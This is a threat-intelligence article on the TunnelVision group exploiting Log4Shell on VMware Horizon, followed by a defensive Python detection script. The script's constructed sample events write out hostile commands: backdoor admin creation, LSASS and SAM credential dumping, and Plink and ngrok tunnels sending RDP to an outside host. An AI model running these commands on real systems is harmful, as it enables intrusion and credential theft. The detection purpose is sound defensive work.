An Iran-aligned hacking group tracked as TunnelVision has been spotted exploiting the Log4j vulnerability (Log4Shell) on VMware Horizon servers to breach corporate networks in the Middle East and the United States.
SentinelLabs security analysts who tracked the activity chose the name because of the group's heavy reliance on tunneling tools, which it uses to hide its activity from detection solutions.
Tunneling, in this context, means wrapping one protocol's traffic inside another connection (for example, carrying RDP over an SSH session to an attacker-controlled host) so that the real destination and contents of the traffic are hidden from network monitoring.
TunnelVision's ultimate goal appears to be the deployment of ransomware, so the group isn't focused only on cyber espionage, but also on data destruction and operational disruption.
TunnelVision previously targeted CVE-2018-13379 (a Fortinet FortiOS SSL VPN path traversal), the set of Microsoft Exchange ProxyShell vulnerabilities, and has now turned to the Log4Shell exploit (CVE-2021-44228).
The targets are VMware Horizon servers that still run a vulnerable Log4j version; Log4Shell is trivial to exploit, needing only a crafted JNDI lookup string in any input the server logs.
The exploit process is the same as the one detailed by the NHS in a January 2022 security bulletin: the Log4Shell payload makes the Horizon Tomcat service execute PowerShell commands directly, and those commands establish reverse shells.
The PowerShell commands return their output to the adversaries through a webhook, and all connections go to legitimate public web services, so the traffic blends in with normal outbound activity.
SentinelLabs observed TunnelVision deploying two custom reverse-shell backdoors on compromised machines.
The first payload is a zip file that contains an executable named "InteropServices.exe", an obfuscated reverse shell that connects back to "microsoft-updateserver[.]cc".
The second payload, the one used most often in the recent attacks, is a modified version of a one-liner PowerShell reverse shell available on GitHub.
TunnelVision relies on this second backdoor to perform the following actions:
- Execute reconnaissance commands.
- Create backdoor user accounts and add them to the local Administrators group.
- Collect credentials using ProcDump, SAM registry hive dumps, and the comsvcs.dll MiniDump technique.
- Download and run tunneling tools, including Plink and Ngrok, to tunnel RDP traffic out of the network.
- Execute a reverse shell through the NodeJS component that ships with VMware Horizon.
- Scan the internal subnet for RDP using a publicly available port scan script.
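The tradecraft above (Tomcat spawning PowerShell, backdoor admin accounts, LSASS and SAM dumping, Plink/Ngrok RDP tunnels, the Horizon node.exe reverse shell) is all visible in process-creation telemetry. The following script is an added example, not code from SentinelLabs or the article, showing one way to express those observations as detection rules and run them over Sysmon Event ID 1-style records. The events are constructed for the example, not captured data; the process name ws_TomcatService.exe for the Horizon Tomcat service and the "node.exe -e ... child_process" pattern for the NodeJS reverse shell are assumptions about how the activity appears on disk, and should be tuned against your own Horizon hosts.

```python
"""Process-creation detections for the TunnelVision tradecraft described above.

Added example: the events below are hand-written Sysmon Event ID 1-style
records, not real telemetry, and the rules are illustrative, not vendor logic.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


def _name(path: str) -> str:
    """Lower-case basename of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def tomcat_spawns_shell(e: ProcEvent) -> bool:
    # Log4Shell on Horizon fires inside the Tomcat service, so the first
    # attacker-controlled process is a shell whose parent is that service.
    # ws_TomcatService.exe is the assumed Horizon service binary name.
    return _name(e.parent_image) == "ws_tomcatservice.exe" and _name(e.image) in SHELLS


def backdoor_admin(e: ProcEvent) -> bool:
    # "net user X pw /add" followed by "net localgroup administrators X /add"
    cl = e.command_line.lower()
    if _name(e.image) not in {"net.exe", "net1.exe"}:
        return False
    return bool(re.search(r"\buser\s+\S+.*\s/add\b", cl)
                or re.search(r"\blocalgroup\s+administrators\s+\S+.*\s/add\b", cl))


def credential_dump(e: ProcEvent) -> bool:
    # comsvcs.dll MiniDump of a process, ProcDump of LSASS, or a SAM hive export
    cl = e.command_line.lower()
    img = _name(e.image)
    if img == "rundll32.exe" and "comsvcs" in cl and "minidump" in cl:
        return True
    if img in {"procdump.exe", "procdump64.exe"} and "lsass" in cl:
        return True
    return img == "reg.exe" and re.search(r"\bsave\s+hklm\\sam\b", cl) is not None


def rdp_tunnel(e: ProcEvent) -> bool:
    # Plink remote port forward (-R) or ngrok TCP tunnel exposing RDP (3389)
    cl = e.command_line.lower()
    img = _name(e.image)
    if img == "plink.exe":
        return re.search(r"\s-r\s+\S*:3389\b", cl) is not None
    if img == "ngrok.exe":
        return re.search(r"\btcp\s+(\S+:)?3389\b", cl) is not None
    return False


def horizon_node_shell(e: ProcEvent) -> bool:
    # Horizon ships node.exe; an inline (-e) script that reaches for
    # child_process is not normal service behaviour (assumed indicator).
    cl = e.command_line.lower()
    return _name(e.image) == "node.exe" and " -e " in cl and "child_process" in cl


RULES = [
    ("tomcat_spawns_shell", tomcat_spawns_shell),
    ("backdoor_admin", backdoor_admin),
    ("credential_dump", credential_dump),
    ("rdp_tunnel", rdp_tunnel),
    ("horizon_node_shell", horizon_node_shell),
]


def detect(events):
    """Return [(event_index, rule_name)] for every rule each event trips."""
    return [(i, name) for i, e in enumerate(events) for name, fn in RULES if fn(e)]


# Constructed sample telemetry: attacker lines modelled on the tradecraft
# above, followed by benign noise. None of this is captured data.
HORIZON = r"C:\Program Files\VMware\VMware View\Server"
SAMPLE = [
    ProcEvent(HORIZON + r"\bin\ws_TomcatService.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -ep bypass -c iex(...)"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net user svc_backup P@ssw0rd! /add"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net localgroup administrators svc_backup /add"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\temp\l.dmp full"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg save hklm\sam C:\temp\sam.hiv"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\temp\plink.exe",
              "plink.exe -ssh -N -R 0.0.0.0:2222:127.0.0.1:3389 tun@203.0.113.5 -pw x"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\temp\ngrok.exe", "ngrok tcp 3389"),
    ProcEvent(HORIZON + r"\bin\ws_TomcatService.exe", HORIZON + r"\appblastgateway\node.exe",
              "node.exe -e \"require('child_process').exec('powershell ...')\""),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe", "net user"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\temp\plink.exe", "plink.exe -ssh u@203.0.113.5"),
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE):
        print(f"event {idx}: {rule}")
```

The Tomcat-to-shell rule is the highest-value one here: a Horizon server has no legitimate reason to spawn PowerShell from its Tomcat service, so it fires on the initial Log4Shell foothold before any of the later tooling appears, whereas the tunneling and credential-dumping rules need tuning because ProcDump, Plink and reg save all have administrative uses.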
A separate cluster
While TunnelVision has similarities and overlaps with other Iranian hacking groups, SentinelLabs attributes the activity to a separate and distinct cluster.
"TunnelVision's activities have already been discussed and are tracked by other vendors under various names, such as Phosphorus (Microsoft) and, confusingly, Charming Kitten or Nemesis Kitten (CrowdStrike)," the SentinelLabs report explains.
"This confusion arises because the activity that Microsoft recognizes as one group, 'Phosphorous', overlaps with the activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten."
As the analysts conclude, a relationship between these groups cannot be ruled out, but at this time there is insufficient evidence pointing to any link.